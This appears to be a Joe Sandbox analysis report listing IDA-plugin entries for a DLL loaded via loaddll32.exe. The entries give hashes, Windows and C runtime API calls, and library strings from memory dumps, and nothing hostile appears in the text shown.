                                                                                                      • Instruction ID: b734c07650e8d05e30e426fb69c421d7f773871a15c18c4804b38e7b9f1c168c
                                                                                                      • Opcode Fuzzy Hash: 6a094c77072490cd3444e7da7943df1b310b506465ccc856fa0d3eb6ab9854e5
                                                                                                      • Instruction Fuzzy Hash: 5401F7727096167F67119A7A4C4EE7F2A7DDEC7AA0725012DF954C3204DF61CC0781B0
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(?,?,?,6D40DE2B,6D41197F,?,?,6D408FF7,?,?,24448D6D,00000000,?,6D4012A7,?,?), ref: 6D4120A9
                                                                                                      • SetLastError.KERNEL32(00000000,00000004,000000FF,?,6D408FF7,?,?,24448D6D,00000000,?,6D4012A7,?,?,?), ref: 6D4120CF
                                                                                                      • _free.LIBCMT ref: 6D41210F
                                                                                                      • _free.LIBCMT ref: 6D412142
                                                                                                      • SetLastError.KERNEL32(00000000,?,?,?), ref: 6D41214F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 3170660625-0
                                                                                                      • Opcode ID: 167cf3bac50b6d04b3f50aa12f4c9dbbc55dc8caf96e7826317a05dba078541d
                                                                                                      • Instruction ID: 2bda6448b3b441e3fb09d0f83113509d50e19d68fd6d0e9d93a03f90bde1a15a
                                                                                                      • Opcode Fuzzy Hash: 167cf3bac50b6d04b3f50aa12f4c9dbbc55dc8caf96e7826317a05dba078541d
                                                                                                      • Instruction Fuzzy Hash: 8C11567211D606779621A6798D86F3A2579BB976B97A34318F728E22D0DF21CC018160
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,6D40C19D,00000000,00000000,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411F5A
                                                                                                      • _free.LIBCMT ref: 6D411FB1
                                                                                                      • _free.LIBCMT ref: 6D411FE5
                                                                                                      • SetLastError.KERNEL32(00000000,00000000,?,0161F638,00000000), ref: 6D411FF2
                                                                                                      • SetLastError.KERNEL32(00000000,00000004,000000FF,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411FFE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 3170660625-0
                                                                                                      • Opcode ID: ff98c3b37daa7835104a912b119244e757d28da08ced3ad9a074eb5eb17f045c
                                                                                                      • Instruction ID: fab318f76c71c65ddaad4e3e4489068e2376ffd3825a669945eb0acbfbf7c135
                                                                                                      • Opcode Fuzzy Hash: ff98c3b37daa7835104a912b119244e757d28da08ced3ad9a074eb5eb17f045c
                                                                                                      • Instruction Fuzzy Hash: E711883615D606B7DB026779DD05F7E2239BBA6769BA3031CFA38D22D0DF21CC0155A1
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 6D41C600
                                                                                                        • Part of subcall function 6D411902: HeapFree.KERNEL32(00000000,00000000,?,6D41C896,?,00000000,?,00000000,?,6D41CB3B,?,00000007,?,?,6D41AB2E,?), ref: 6D411918
                                                                                                        • Part of subcall function 6D411902: GetLastError.KERNEL32(?,?,6D41C896,?,00000000,?,00000000,?,6D41CB3B,?,00000007,?,?,6D41AB2E,?,?), ref: 6D41192A
                                                                                                      • _free.LIBCMT ref: 6D41C612
                                                                                                      • _free.LIBCMT ref: 6D41C624
                                                                                                      • _free.LIBCMT ref: 6D41C636
                                                                                                      • _free.LIBCMT ref: 6D41C648
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: e8a1542daa43b8108563a64c92194b4f2f197f43968c92de56cc9834b061b466
                                                                                                      • Instruction ID: f6ba586778494aaad6d76c340847c1529a2691e5e665e76dcbb01d267b4e6198
                                                                                                      • Opcode Fuzzy Hash: e8a1542daa43b8108563a64c92194b4f2f197f43968c92de56cc9834b061b466
                                                                                                      • Instruction Fuzzy Hash: 83F04F7140E20897CA10EF59DC86E3AB3EDAB15651BA55819F029D7600CB30FC9086E8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: r@m
                                                                                                      • API String ID: 0-373373960
                                                                                                      • Opcode ID: c934edff7b7b5a5998b747a36d051b53e8dd084f82369e8d7119a89086daed8e
                                                                                                      • Instruction ID: b3c885667bf9482054245bdd0bacd694d0d091dce5cebcd2f6551a260eba10ee
                                                                                                      • Opcode Fuzzy Hash: c934edff7b7b5a5998b747a36d051b53e8dd084f82369e8d7119a89086daed8e
                                                                                                      • Instruction Fuzzy Hash: 6361A071A1C11AABDB01DFA8CC40FFEB7B8AF4A358F118169DA10A7250D774DD058BE1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: C:\Windows\system32\loaddll32.exe
                                                                                                      • API String ID: 0-1062229814
                                                                                                      • Opcode ID: aac2e9eed3ef5efb71aeedd581abadab590e0996f72cbf5cda67054d0830a92f
                                                                                                      • Instruction ID: 0ddfffde1c96a19fe75c2e81aa5dfff801a16d92a3b63d24639c1b500d3af68a
                                                                                                      • Opcode Fuzzy Hash: aac2e9eed3ef5efb71aeedd581abadab590e0996f72cbf5cda67054d0830a92f
                                                                                                      • Instruction Fuzzy Hash: 2F415075A0C229ABDB11DF9ECD80EBEBBB8FB85310B11416AE514A7240D7708E51CB90
                                                                                                      APIs
                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 6D40A76F
                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 6D40A823
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                      • String ID: Eh@m$csm
                                                                                                      • API String ID: 3480331319-759941577
                                                                                                      • Opcode ID: d157080d203bae239345ee6142ffa09131d83fe60fe0de1d31fbe676242daf6e
                                                                                                      • Instruction ID: 4578d896a4470d93fc161065ffa0d666e75cfef6c29950e9f2f5b96b18523ea7
                                                                                                      • Opcode Fuzzy Hash: d157080d203bae239345ee6142ffa09131d83fe60fe0de1d31fbe676242daf6e
                                                                                                      • Instruction Fuzzy Hash: 7541A234A042499BCF00CF68C881EAEBBB5BF45318F118179E9546B352D731DE56CBE0
                                                                                                      APIs
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 6D401FCF
                                                                                                        • Part of subcall function 6D409071: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00000000,24448D6D,6D4059FC,?,6D42DDF0,?,?,?,24448D6D), ref: 6D4090D1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionRaise___std_exception_copy
                                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                      • API String ID: 3109751735-1866435925
                                                                                                      • Opcode ID: c7674c04880867f5e56eb3409b63ae8aa4279b23a473b51dfbbd07b18ba3f0b6
                                                                                                      • Instruction ID: 657985bba8354cb31239a65af9121e9c5c33e5efe617fa7d7a1549a9590bb5a6
                                                                                                      • Opcode Fuzzy Hash: c7674c04880867f5e56eb3409b63ae8aa4279b23a473b51dfbbd07b18ba3f0b6
                                                                                                      • Instruction Fuzzy Hash: 3D11E7B69147056BC700DF68C801F96B3ACAF19314F08853AFA5AD7641E771ED14CBD1
                                                                                                      APIs
                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,?,6D416009,?,6D42E510,0000000C,6D4160B1,?,?,?), ref: 6D416129
                                                                                                      • GetLastError.KERNEL32(?,6D416009,?,6D42E510,0000000C,6D4160B1,?,?,?), ref: 6D416133
                                                                                                      • __dosmaperr.LIBCMT ref: 6D41615E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                      • String ID: .Wu
                                                                                                      • API String ID: 2583163307-3424199868
                                                                                                      • Opcode ID: 3d09b87febcee8acabd00c3fd9a7b6969fdcc5bbc20ba933dd71bc8f4e116753
                                                                                                      • Instruction ID: 35af0d37948b458148aa0b96349eaa7696c85e7f886279b6b050c69004dcb215
                                                                                                      • Opcode Fuzzy Hash: 3d09b87febcee8acabd00c3fd9a7b6969fdcc5bbc20ba933dd71bc8f4e116753
                                                                                                      • Instruction Fuzzy Hash: 9E01263BA0C16116C61597399C84F7E2B6AAB83738F36062DEA14C76C2DF61CC8181D0
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strrchr
                                                                                                      • String ID:
                                                                                                      • API String ID: 3213747228-0
                                                                                                      • Opcode ID: 11cc333336918b2aceaa9b877d76c2bed9ff9120129b65150a3e582bec28987f
                                                                                                      • Instruction ID: 9bda0eadc5e696ad1c63e2920e0f587492a8dc590e90ad5dfc2d49a1e7be5365
                                                                                                      • Opcode Fuzzy Hash: 11cc333336918b2aceaa9b877d76c2bed9ff9120129b65150a3e582bec28987f
                                                                                                      • Instruction Fuzzy Hash: 14B1FF7190829A9FDB22CF58CCD2BBEBBA5FB47314F254169D544EB341DA348D42CBA0
                                                                                                      APIs
                                                                                                      • WriteConsoleW.KERNEL32(?,?,0000002C,00000000,?,?,6D41E5A8,?,00000001,?,00000001,?,6D4164B3,00000020,00000000,00000001), ref: 6D41FBF9
                                                                                                      • GetLastError.KERNEL32(?,6D41E5A8,?,00000001,?,00000001,?,6D4164B3,00000020,00000000,00000001,00000020,00000001,?,6D416A32,00000008), ref: 6D41FC05
                                                                                                        • Part of subcall function 6D41FBCB: CloseHandle.KERNEL32(FFFFFFFE,6D41FC15,?,6D41E5A8,?,00000001,?,00000001,?,6D4164B3,00000020,00000000,00000001,00000020,00000001), ref: 6D41FBDB
                                                                                                      • ___initconout.LIBCMT ref: 6D41FC15
                                                                                                        • Part of subcall function 6D41FB8D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6D41FBBC,6D41E58E,00000001,?,6D4164B3,00000020,00000000,00000001,00000020), ref: 6D41FBA0
                                                                                                      • WriteConsoleW.KERNEL32(?,?,0000002C,00000000,?,6D41E5A8,?,00000001,?,00000001,?,6D4164B3,00000020,00000000,00000001,00000020), ref: 6D41FC2A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                      • String ID:
                                                                                                      • API String ID: 2744216297-0
                                                                                                      • Opcode ID: 2ec8c4fdafab03f85edf75f7a50a3d75e668bad95a6bfe3e45ce16307cdc1c12
                                                                                                      • Instruction ID: 47d831078b68c11ff93a9b6f00ec5a7cc1530cd8c050bebd293bf244a4333374
                                                                                                      • Opcode Fuzzy Hash: 2ec8c4fdafab03f85edf75f7a50a3d75e668bad95a6bfe3e45ce16307cdc1c12
                                                                                                      • Instruction Fuzzy Hash: 2FF01C37446219BBCF222F91CC04EAA3F76FB0A7A1F154014FA1886120D732CC21EB90
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 6D410D7E
                                                                                                        • Part of subcall function 6D411902: HeapFree.KERNEL32(00000000,00000000,?,6D41C896,?,00000000,?,00000000,?,6D41CB3B,?,00000007,?,?,6D41AB2E,?), ref: 6D411918
                                                                                                        • Part of subcall function 6D411902: GetLastError.KERNEL32(?,?,6D41C896,?,00000000,?,00000000,?,6D41CB3B,?,00000007,?,?,6D41AB2E,?,?), ref: 6D41192A
                                                                                                      • _free.LIBCMT ref: 6D410D91
                                                                                                      • _free.LIBCMT ref: 6D410DA2
                                                                                                      • _free.LIBCMT ref: 6D410DB3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: ca58fe2bc87622956b0631a2c213b5686ca3d1d22323760f067fd1de443d22e1
                                                                                                      • Instruction ID: 78a0b45f693bad18928316d50ca41af4ff03703e623af40803d506098eef852c
                                                                                                      • Opcode Fuzzy Hash: ca58fe2bc87622956b0631a2c213b5686ca3d1d22323760f067fd1de443d22e1
                                                                                                      • Instruction Fuzzy Hash: 28E0467882E2209B8F6ABF2F9801F593BB9B726B04743434AE06012250CB318C22DFC0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strcspn
                                                                                                      • String ID: <,@m
                                                                                                      • API String ID: 3709121408-1771337057
                                                                                                      • Opcode ID: 8d2d622041a6741c9a46e639c17066a607ee518ad89f32de36ed798e96818cc7
                                                                                                      • Instruction ID: 2e14146853885407bba907ca35a520a758e83f733ec4b53e15365b2d46c1dd89
                                                                                                      • Opcode Fuzzy Hash: 8d2d622041a6741c9a46e639c17066a607ee518ad89f32de36ed798e96818cc7
                                                                                                      • Instruction Fuzzy Hash: 74E17D75A002499FDB04CFA8C894FEEBBB9FF49304F208169E915AB351D731AD45CBA1
                                                                                                      APIs
                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 6D40F82D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorHandling__start
                                                                                                      • String ID: pow
                                                                                                      • API String ID: 3213639722-2276729525
                                                                                                      • Opcode ID: 602110d9c61fa53b5ea4bf9088ded058858855006909f2e323eeb789741ad1ea
                                                                                                      • Instruction ID: bcee5ab13a32418d5ee75da45809b256b3b768808ba37bad763d8858423e5ce8
                                                                                                      • Opcode Fuzzy Hash: 602110d9c61fa53b5ea4bf9088ded058858855006909f2e323eeb789741ad1ea
                                                                                                      • Instruction Fuzzy Hash: 47513971A5E10396DB01BB14CD40FB97BB4AB81B41F308D79E4F546398EB36CCC58A8A
                                                                                                      APIs
                                                                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,6D41FFAF), ref: 6D41EC1B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DecodePointer
                                                                                                      • String ID: Eh@m$\KBm
                                                                                                      • API String ID: 3527080286-3111840648
                                                                                                      • Opcode ID: c9ed12d36658fbbb6d0e6c01bf508ea1ab688874e325b629397de8d56acdd189
                                                                                                      • Instruction ID: b97f82ef9fa4124437353665ae45222d3dd5517bc7bba6f0dd4cbc946bd75af5
                                                                                                      • Opcode Fuzzy Hash: c9ed12d36658fbbb6d0e6c01bf508ea1ab688874e325b629397de8d56acdd189
                                                                                                      • Instruction Fuzzy Hash: CD51487890864ACBCB00DF68DD88BBDBFB4FF4A340F6141A8D491E7A54DB318D258B59
                                                                                                      APIs
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 6D401FCF
                                                                                                        • Part of subcall function 6D409071: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00000000,24448D6D,6D4059FC,?,6D42DDF0,?,?,?,24448D6D), ref: 6D4090D1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionRaise___std_exception_copy
                                                                                                      • String ID: ios_base::badbit set$ios_base::failbit set
                                                                                                      • API String ID: 3109751735-1240500531
                                                                                                      • Opcode ID: 4e4c16310dc02743aa846f904a13e9afd20f93d1b82582bbb9360f9bdbd4c968
                                                                                                      • Instruction ID: 1b1c70fec707b079bf81af241d2194a8ea65fb97baf63d50854232e13623613c
                                                                                                      • Opcode Fuzzy Hash: 4e4c16310dc02743aa846f904a13e9afd20f93d1b82582bbb9360f9bdbd4c968
                                                                                                      • Instruction Fuzzy Hash: 1741B275A14209ABC704DF68C840FAEBBB8EF49328F14852EE615E7781D771AD448BA1
                                                                                                      APIs
                                                                                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6D40B0DE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EncodePointer
                                                                                                      • String ID: MOC$RCC
                                                                                                      • API String ID: 2118026453-2084237596
                                                                                                      • Opcode ID: c12d619d46cd1ef28864f4525e07501091ca408bca4625e600ec37690c9648d4
                                                                                                      • Instruction ID: fa11b41b72e5d20d2b4f7c5cfda2f0f710dd4f078491ffcf0c3e8d549d9514c7
                                                                                                      • Opcode Fuzzy Hash: c12d619d46cd1ef28864f4525e07501091ca408bca4625e600ec37690c9648d4
                                                                                                      • Instruction Fuzzy Hash: B141497290020AAFCF06CF94CD81EEE7BB5FF48344F258069FA146A210D3359E61DB95
                                                                                                      APIs
                                                                                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6D41D621,00000000,00000050,?,?,?,?,?), ref: 6D41D4A1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ACP$OCP
                                                                                                      • API String ID: 0-711371036
                                                                                                      • Opcode ID: d867a386a48197b94e4ee3be71525d37cef8140cc72bf4d8b975eb60631bb92b
                                                                                                      • Instruction ID: ecd71b37d3e8013d5d8fec42c9691bd63e2fbdc999935eb1f52f3c481f01c288
